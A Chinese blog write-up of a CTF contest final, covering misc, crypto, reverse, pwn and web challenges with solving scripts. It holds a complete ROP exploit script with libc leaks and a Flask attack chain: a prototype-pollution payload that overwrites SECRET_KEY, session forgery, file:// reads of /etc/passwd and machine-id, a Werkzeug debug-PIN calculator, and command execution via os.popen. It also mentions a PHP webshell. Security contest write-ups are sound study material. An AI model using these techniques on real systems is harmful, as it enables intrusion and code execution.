内部赛-2023第三届网络安全攻防大赛个人赛③-决赛WriteUp

最新推荐文章于 2024-08-15 01:55:01 发布
最新推荐文章于 2024-08-15 01:55:01 发布
阅读量352 收藏 10
点赞数 3
文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wgf42421/article/details/140810046
版权

有几个不会的,接着卷.

misc

where_is_pwd

用hint.zip 明文攻击

得到FLAG hint.txt 和另一个压缩包

FLAG改名为FLAG.TTF 导入字体

hint.txt内容复制到word 全选 改字体得到压缩包密码

三裂偏移

给了提示: 推测每行数字为三个点,对应原点位置偏移量,利用三圆定位法确定原点位 以及 insec函数

直接用提示的脚本来吧.

import math
import re


def insec(p1, r1, p2, r2):
    x = p1[0]
    y = p1[1]
    R = r1
    a = p2[0]
    b = p2[1]
    S = r2
    d = math.sqrt((abs(a - x)) ** 2 + (abs(b - y)) ** 2)
    if d > (R + S) or d < (abs(R - S)):
        print("Two circles have no intersection")
        return
    elif d == 0 and R == S:
        print("Two circles have same center!")
        return
    else:
        A = (R ** 2 - S ** 2 + d ** 2) / (2 * d)
        h = math.sqrt(R ** 2 - A ** 2)
        x2 = x + A * (a - x) / d
        y2 = y + A * (b - y) / d
        x3 = round(x2 - h * (b - y) / d, 2)
        y3 = round(y2 + h * (a - x) / d, 2)
        x4 = round(x2 + h * (b - y) / d, 2)
        y4 = round(y2 - h * (a - x) / d, 2)
        s0 = {(x3, y3), (x4, y4)}
        return s0


def go():
    lst = []
    f = open('data.txt', 'r', encoding='utf8')
    txt = f.read()
    for line in txt.splitlines():
        res = line.strip(';').split(";")
        a1, a2, a3 = res

        "'(661, 103)-655.3388436526558'"
        p1, r1 = get_param(a1)
        p2, r2 = get_param(a2)
        p3, r3 = get_param(a3)
        rs = insec(p1, r1, p2, r2)
        rs2 = insec(p3, r3, p2, r2)
        point = rs & rs2
        lst.append(point)

    f1 = open('point.txt', 'w', encoding='utf8')
    for line in lst:
        x,y = line.pop()
        f1.write(f"{x} {y}\n")
    f1.close()


def get_param(a1):
    m = re.search(r"\((\d+), (\d+)\)(.*)", a1).groups()
    p1 = float(m[0]), float(m[1])
    r1 = float(m[2][1:])
    return p1, r1


go()

画一下坐标即可 .

pwn

Findpath

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
from ctypes import *
# context.log_level = 'debug'
def exp():
    pop_rdi_ret = 0x000000000040173b
    leave_ret = 0x000000000040164e
    # payload = p64(0x404040 + 0x100)
    payload = "I_can_find_the_right_path\n\n"
    payload = payload.ljust(0x20,'\x00')
    payload += p64(0x401737)
    payload += p64(0x401716)
    print(len(payload))
    p.send(payload)
    payload = "a"*0x30
    payload += p64(0x404040 + 0x18)
    payload += p64(leave_ret)
    p.recv()
    p.send(payload)
    
    payload = p64(0x404040 + 0x500)
    payload += p64(0x401716)
    payload = payload.ljust(0x30,"a")
    payload += p64(0x404030)
    payload += p64(leave_ret)
    p.send(payload)
    
    sleep(0.01)
    payload = p64(0x404040 + 0x600)
    payload += p64(pop_rdi_ret)
    payload += p64(elf.got["puts"])
    payload += p64(elf.sym["puts"])
    payload += p64(0x401716)
    payload = payload.ljust(0x30,"a")
    payload += p64(0x404010 + 0x500)
    payload += p64(leave_ret)
    p.send(payload)
    
    libc_base = l64() - libc.sym["puts"]
    print(hex(libc_base))
    pop_rdx_r12 = 0x0000000000090529 + libc_base
    pop_rsi_ret = libc_base + libc.search(asm("pop rsi;ret"),executable=True).next()
    pop_rsp_ret = libc_base + libc.search(asm("pop rsp;ret"),executable=True).next()
    sleep(0.01)
    payload = p64(0x404040 + 0x700)
    payload += p64(pop_rsi_ret)
    payload += p64(0x404630)
    payload += p64(elf.sym["read"])
    payload += p64(0x40184C)
    payload = payload.ljust(0x30,"a")
    payload += p64(0x404608+0x8)
    payload += p64(leave_ret)
    p.send(payload)
    sleep(0.01)
    p.send(p64(pop_rsi_ret) + p64(0x404660) + p64(pop_rdx_r12) + p64(0x60)*2  +p64(elf.sym["read"]))
    sleep(0.01)
    #leak heap
    addr = 0x2193c0 + libc_base
    payload = p64(pop_rdi_ret) + p64(1) + p64(pop_rsi_ret) + p64(addr) + p64(libc_base + libc.sym["write"]) 
    payload += p64(pop_rdi_ret) + p64(0) + p64(pop_rsi_ret) + p64(0x4046b0)
    payload += p64(elf.sym["read"])
    p.send(payload)
    heap_addr = (p.recv(8))
    heap_addr = u64(p.recv(8))
    print(hex(heap_addr))
    p.recv(0x58)
    payload = p64(pop_rdi_ret) + p64(1) + p64(pop_rsi_ret) + p64(heap_addr + 0x2d0) + p64(pop_rdx_r12) + p64(0x100)*2 +p64(libc_base + libc.sym["write"]) 
    # log.hexdump(heap_addr)
    p.send(payload)
    sleep(0.01)
    p.interactive()
if __name__ == "__main__":
    binary = './pwn1'
    elf = ELF('./pwn1')
    context.binary = binary
    libc = ELF("./libc.so.6")
    if(len(sys.argv) == 3):
        p = remote(sys.argv[1],sys.argv[2])
    else:
        p = process(binary)
        # p = process(["seccomp-tools","dump","./pwn1"])
    l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
    l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
    sla = lambda a,b  :p.sendlineafter(str(a),str(b))
    sa  = lambda a,b  :p.sendafter(str(a),str(b))
    lg  = lambda name,data : p.success(name + ": 0x%x" % data)
    se  = lambda payload: p.send(payload)
    rl  = lambda      : p.recv()
    sl  = lambda payload: p.sendline(payload)
    ru  = lambda a     :p.recvuntil(str(a))
    exp()
"""
0x50a37 posix_spawn(rsp+0x1c, "/bin/sh", 0, rbp, rsp+0x60, environ)
constraints:
  rsp & 0xf == 0
  rcx == NULL
  rbp == NULL || (u16)[rbp] == NULL

0xebcf1 execve("/bin/sh", r10, [rbp-0x70])
constraints:
  address rbp-0x78 is writable
  [r10] == NULL || r10 == NULL
  [[rbp-0x70]] == NULL || [rbp-0x70] == NULL

0xebcf5 execve("/bin/sh", r10, rdx)
constraints:
  address rbp-0x78 is writable
  [r10] == NULL || r10 == NULL
  [rdx] == NULL || rdx == NULL

0xebcf8 execve("/bin/sh", rsi, rdx)
constraints:
  address rbp-0x78 is writable
  [rsi] == NULL || rsi == NULL
  [rdx] == NULL || rdx == NULL
"""

Crypto

matrix

题目分成三个挑战,要求都是恢复m,哈希后和密文异或即可解密

第一轮M没有缺少列,所以可以直接用solve_left解出来。

第二轮M少了一列,但可以通过爆破来恢复前31个字节,然后判断是否在范围内,从而确定最后的m

第三轮M少了一半,只能用格来做。造一个49*48的格,LLL后取第二行的后32个,svp得到的结果就是m

exp:

from Crypto.Util.number import *
import hashlib

LEN = 32
def xor(a, b):
    return bytes([a[i%len(a)] ^^ b[i%len(b)] for i in range(max(len(a), len(b)))])

def chall1(data, enc):
    print("chall1")
    M = data['M']
    p = data['p']
    c = data['c']
    M = matrix(Zmod(p), LEN, LEN, M)
    c = vector(Zmod(p), c)
    m = M.solve_left(c)
    print(m)        
    tmp = b''
    for i in range(LEN):
        tmp += long_to_bytes(int(m[i]))
    print(len(tmp))
    return xor(enc, hashlib.sha512(tmp).digest())

def chall2(data, enc):
    print("chall2")
    M = data['M']
    p = data['p']
    c = data['c']
    M = matrix(Zmod(p), LEN, LEN-1, M)
    M = M[:32]
    # print(M)
    c = vector(Zmod(p), c)
    # print(c)
    m = M[-1]
    for _ in range(256):
        tmp = c - _ * m
        res = M.solve_left(tmp)
        if all([0 <= res[j] <= 256 for j in range(LEN-1)]):
            break
    mm = b''
    for i in range(LEN-1):
        mm += long_to_bytes(int(res[i]))
    print(res)
    mm += long_to_bytes(_)
    print(len(mm))
    return xor(enc, hashlib.sha512(mm).digest())

def chall3(data, enc):
    print("chall3")
    M = data['M']
    p = data['p']
    c = data['c']
    M = matrix(Zmod(p), LEN, LEN//2, M)
    c = vector(Zmod(p), c)

    m = matrix(ZZ, 49, 48)
    for i in range(LEN):
        m[i, i+LEN//2] = 1
        for j in range(LEN//2):
            m[i,j] = M[i,j]
            m[j+LEN,j] = p
            m[-1, j] = c[j]
    ml = m.LLL()
    print(ml[1][16:])
    res = ml[1][16:]
    mm = b''
    for i in range(LEN):
        mm += long_to_bytes(abs(res[i]))
    print(len(mm))
    
    return xor(enc, hashlib.sha512(mm).digest())


with open("output.txt", 'r') as f:
    out = eval(f.read()[5:])

# print(out)
enc = long_to_bytes(int(out['enc'], 16))
# print(enc)
enc = chall3(out['chall3'],enc)
# print(enc)
enc = chall2(out['chall2'],enc)
# print(enc)

enc = chall1(out['chall1'],enc)
print(f"flag: {enc}")


 b'flag{db1ebd0c-1cac-55d5-763e-b05f3d9af423}\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16'

web

ezflask

通过如下利用修改key

{
    "__init\u005f_" : {
        "__globals\u005f_" : {
            "app" : {
                "config" : {
                    "SECRET_KEY" :"aaa"
                }
            }
        }
    },
    "username":1,
    "password":1
}

然后伪造session python3 flask_session_cookie_manager3.py encode -s 'aaa' -t '{"username": "admin","Login": 1}' 依次读取flask-pin码计算所需的文件

/read?url=file://127.0.0.1/etc/passwd
/read?url=file://127.0.0.1/sys/class/net/eth0/address
/read?url=file://127.0.0.1/etc/machine-id
/read?url=file://127.0.0.1/proc/self/cgroup

然后利用flask-pin.py计算处pin值,进入 /console 输入正确的pin即可获得代码执行

flask-ping

import hashlib
from itertools import chain

probably_public_bits = [
    'ctf'  # username 可通过/etc/passwd获取
    'flask.app',  # modname默认值
    'Flask',  # 默认值 getattr(app, '__name__', getattr(app.__class__, '__name__'))
    '/usr/local/lib/python3.8/site-packages/flask/app.py'  # 路径 可报错得到  getattr(mod, '__file__', None)
]

private_bits = [
    '2485723361282',  # /sys/class/net/eth0/address mac地址十进制
    '96cec10d3d9307792745ec3b85c8962033876d8e5655e5c276c891fd62874a73a7b651056e98c1f896fbe1edcee12936'

    # 字符串合并:首先读取文件内容 /etc/machine-id(docker不用看) /proc/sys/kernel/random/boot_id   /proc/self/cgroup
    # 有machine-id 那就拼接machine-id + /proc/self/cgroup  否则 /proc/sys/kernel/random/boot_id + /proc/self/cgroup
]

# 下面为源码里面抄的,不需要修改
h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv = None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)

进入 http://x.x/console 输入pin码

import os
os.popen('ls /').read()
os.popen('/readflag').read()

web2

扫到 www.zip 爆破 md5 217f81b8ff0a1ab138a8e1bdc031262e 为 leet

直接连用1337.php一句话木马.

reverse

snake

拖进 ida64 就可以发现大体逻辑很清晰

加密二稍微跟踪了一下发现是固定数组的乘法之和,实际上是四元一次方程

加密一分成两部分,上部分是字符位移

把 "Sn@k{0123456789}" 位移成了 "Sn@k678{5}904321"

下部分是异或

中间的生成异或数 函数逻辑简化如下

int sub_7FF758A91198(const char *a1)
{
    unsigned int v3; // r8d

    v3 = *a1;
    for(int i = 0; i < 3; ++i)
    {
        v3 ^= a1[4 + i * 4];
    }

    return v3;
}

解题脚本如下

from z3 import *

# 创建四个整数变量
x = Int('x')
y = Int('y')
z = Int('z')
w = Int('w')

# 定义四个方程的和
sum_values = [
    [1078, 692, 687, 786],
    [746, 595, 522, 654],
    [454, 348, 380, 378],
    [1694, 1198, 1201, 1314]
]

solutions = []  # 存储解的列表

for i in range(4):
    # 创建一个Z3求解器
    solver = Solver()

    # 添加四个方程到求解器
    equation1 = x + 5*y + 4*z + 3*w == sum_values[0][i]
    equation2 = 2*x + y + 2*z + 3*w == sum_values[1][i]
    equation3 = 2*x + y + z + w == sum_values[2][i]
    equation4 = 3*x + 5*y + 4*z + 7*w == sum_values[3][i]

    solver.add(equation1, equation2, equation3, equation4)

    # 检查是否存在解
    if solver.check() == sat:
        # 有解,获取解的模型
        model = solver.model()
        # 将解存储到列表中
        solutions.append({
            'x': model[x].as_long(),
            'y': model[y].as_long(),
            'z': model[z].as_long(),
            'w': model[w].as_long()
        })
    else:
        solutions.append(None)  # 如果没有解,存储None

last = [0] * 16
# 打印结果
for i, solution in enumerate(solutions):
    #print(f"Solution for sum{i + 1}:")
    if solution:
        #print(f"x = {solution['x']}")
        #print(f"y = {solution['y']}")
        #print(f"z = {solution['z']}")
        #print(f"w = {solution['w']}")
        last[i + 4 * 0] = solution['x']
        last[i + 4 * 1] = solution['y']
        last[i + 4 * 2] = solution['z']
        last[i + 4 * 3] = solution['w']
    else:
        print("No solution")
    #print()

print(last)
#[100, 89, 119, 92, 66, 5, 69, 4, 84, 83, 4, 104, 104, 82, 69, 86]


TestIn  = "Sn@k{0123456789}"
TestOut = "Sn@k678{5}904321"

flag = [0] * 16
#flag[0:4] = "Sn@k"
flag[0:4] = last[0:4]
for i in range(4,16):
    flag[i] = last[TestOut.find(TestIn[i])]

#a1[0] ^ a1[4] ^ a1[8] ^ a1[12]
#flag[0] = a1[4] ^ a1[8] ^ a1[12]
#flag[4] = a1[0] ^ a1[8] ^ a1[12]
#flag[8] = a1[0] ^ a1[4] ^ a1[12]
#flag[12] = a1[0] ^ a1[4] ^ a1[8]

a1 = [0] * 16
a1[0] = ord('S')
a1[4] = flag[0] ^ flag[4] ^ a1[0]
a1[8] = flag[4] ^ flag[8] ^ a1[4]
a1[12] = flag[8] ^ flag[12] ^ a1[8]

xord = a1[0] ^ a1[4] ^ a1[8] ^ a1[12]

for i in range(16):
    flag[i] = chr(flag[i] ^ xord);

print("".join(flag))
wgf42421
关注
  • 3
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
内部-2022第二届网络安全攻防大赛个人赛决赛 WriteUp.
07-24 126
题目给了两个pyc文件。用uncompyle和pycdc还原效果不一样。可以看字节码再手动还原关键代码。下面给出最终还原结果及注释。chal分析可知起点第一列,终点最后一列。vshell还原全部分析了,发现没有分析的必要,可以看字符猜起点,终点位置。pyc中找到上下左右即可以,不需要过多的分析。直接DFS算法解题。使用pwntools连续回答问题。main.py。
2022某省网络安全管理员职业技能大赛个人Writeup及日历密码原理
更多知识欢迎访问我的博客园:https://www.cnblogs.com/2ha0yuk7on/
09-01 1474
2022年某省网络安全管理员职业技能大赛个人Writeup
5月全球CTF比时间汇总来了!
网络安全
05-03 8436
●5月全球CTF比时间汇总来了!●从事网络安全行业工作,怎么能不参加一次CTF比了!小编作为一个CTF比老鸟,以每次都能做出签到题为荣!下面给大家分享一下5月份CTF比时间,比...
2024年最新网络安全从零开始学习CTF——CTF基本概念_ctf竞编程环境是什么,大厂直通车
2301_82056337的博客
05-06 704
为了帮助大家更好的学习网络安全,小编给大家准备了一份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂,所有资料共282G,朋友们如果有需要全套网络安全入门+进阶学习资源包,可以********************************************************************************************************************************点击免费领取。
网络安全大赛
weixin_74789176的博客
02-05 4781
和往常一样,VMware 是本类别的主要目标,VMware ESXi 和 VMware Workstation 都是其中的目标,赏金分别是15万美元和8万美元。这些外卡通常也是一些质量很高的重量级比,比如今年就包括有PlaidCTF,Boston Key Party,Ghost in the Shellcode,SECCON CTF,RuCTFE以及去年的DEFCON CTF决赛,只有获得这些比的冠军才能够获得DEFCON决赛的入场券,所以难度一点也不比参加预低。2017年举办的第一届。
网络安全从零开始学习CTF——CTF基本概念_ctf竞编程环境是什么
2401_84254057的博客
04-29 957
一般大型比大都是i春秋承办的,以小组的形式比,分预选和总决赛
CTF 学习笔记
梁辰兴的博客
10-06 4845
CTF起源于1996年DEFCON全球黑客大会,以替代之前黑客们通过互相发起真实攻击进行技术比拼的方式。WordPress是利用PHP开发的博客平台,用户可以在支持PHP和MySQL数据库的服务上架设属于自己的网站。也可以把WordPress当做一个内容管理系统(CMS)来使用。WordPress是一款个人博客系统,并逐步演化成一款内容管理系统软件,它是使用PHP语言和MySQL数据库开发的,用户可以在支持PHP和MySQL数据库的服务器上使用自己的博客。
网络安全-零基础小白如何入门CTF
程序员若风的博客
09-06 91
在解题模式CTF制中,参队伍可以通过互联网或者现场网络参与,这种模式的CTF竞与ACM编程竞、信息学奥比较类似,以解决网络安全技术挑战题目的分值和时间来排名,通常用于在线选拔。题目主要包含逆向、漏洞挖掘与利用、Web渗透、密码、取证、隐写、安全编程等类别。一般大型比大都是i春秋承办的,以小组的形式比,分预选和总决赛
2月国内外CTF比时间汇总来了!
网络安全
02-08 5086
●从事网络安全行业工作,怎么能不参加一次CTF比了!小编作为一个CTF比老鸟,以每次都能做出签到题为荣!下面给大家分享一下2月份CTF比时间,比按时间先后排序,国内国外的都有哦!文章末尾有ctf部落群国内CTF比汇总西湖论剑·2022中国杭州网络安全技能大赛12月13日,在“首届全球数字贸易博览会·数字安全主题论坛”上,浙江省公安厅一级警务专员石小忠、浙江省委网信办副主任马晓军、杭州市公...
第四届红帽杯网络安全大赛-线上Writeup1
08-03
第四届红帽杯络安全-线上Writeup 第四届红帽杯络安全 - 线上 Writeup 第四届红帽杯络安全-线上Writeup 第四届红帽杯络安全-
智能网联汽车 天融信杯 信息安全攻防 2023 CTF真题
07-14
智能网联汽车 天融信杯 信息安全攻防 2023 CTF真题
2021一带一路暨金砖大赛之企业信息系统安全项AWD-writeup(解析)
12-18
通过项检验参选手网络组建、安全架构和网络安全运维管控等 方面的技术技能,检验参队组织和团队协作等综合职业素养,培养学 生创新能力和实践动手能力,提升学生职业能力和就业竞争力。通过大 引领专业教学...
第三届上海大学生网络安全(线上)-MS1战队-Writeup
01-20
下面将结合标题、描述及部分内容,详细说明本次第三届上海大学生网络安全(线上)MS1战队的Write-up所蕴含的IT知识点。 ### CTF比概述 CTF(Capture The Flag)是一种信息安全竞,比通过一系列挑战项目...
山东省大学生网络安全技能大赛决赛Writeup.pdf
09-30
本文档总结了山东省大学生网络安全技能大赛决赛Writeup,涵盖了Crypto0x00 RSA1、RSA2和仿射加密三个部分的知识点。 Crypto0x00 RSA1 在Crypto0x00 RSA1部分中,我们需要使用Python脚本或者OpenSSL来解出RSA加密...
Python】入门到放弃之第九章《字典》
最新发布
MP13537560060的博客
08-15 639
这是本系列的第九章节内容,《字典》。在Python中,字典(Dictionary)是一种内置的数据结构,用于存储键值对(key-value pairs)。字典是可变的,意味着你可以在创建字典后添加、删除或修改其中的元素。字典的键(key)必须是唯一的,并且是不可变的(即,它们必须是不可变数据类型,如字符串、数字或元组,但不能是列表或字典等可变类型)。字典的值(value)则可以是任何数据类型,包括列表、元组、字典等。以上,就是Python中字典的全部内容。
python学习】深入解析 `jq` 库:JSON 处理的利器
m0_54007171的博客
08-13 410
jq库是 Python 对流行的命令行工具jq的封装。它允许你直接在 Python 中使用jq的查询语言来处理 JSON 数据。借助jq,你可以轻松地对 JSON 数据进行过滤、选择、转换、聚合等操作,极大地简化了代码复杂度。
GraphRAG:复杂查询的知识图谱新框架
YeJuliaLi的博客
08-14 874
微软最近发布了名为 GraphRAG(Graphs + Retrieval Augmented Generation)的创新 RAG 框架,这是一个将文本提取、语义网络分析,与大语言模型(LLM)的提示和总结功能结合在一起的端到端系统,用于深入理解文本数据集。在对私有数据中的复杂文本信息进行文档分析时,GrahRAG 使用 LLM 生成的知识图谱来大幅提高问答性能。这里的私有数据集是指 LLM 没...
汽车免拆诊断案例 | DAF(达富)汽油尾气处理液故障警示
虹科Pico汽车示波器的博客
08-14 839
一辆DAF(达富)故障警示灯亮,提示DEF系统故障,使用虹科Pico汽车示波器检查发现故障的原因是......
第二届强网杯网络安全挑战Writeup
"这篇资源是关于第二届强网杯全国网络安全挑战Writeup,涵盖了多个关卡的解题策略和技巧。" 在本次网络安全挑战中,参者需要解决一系列网络安全问题,这些问题涉及到图像隐写术、密码学、程序逆向工程以及...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值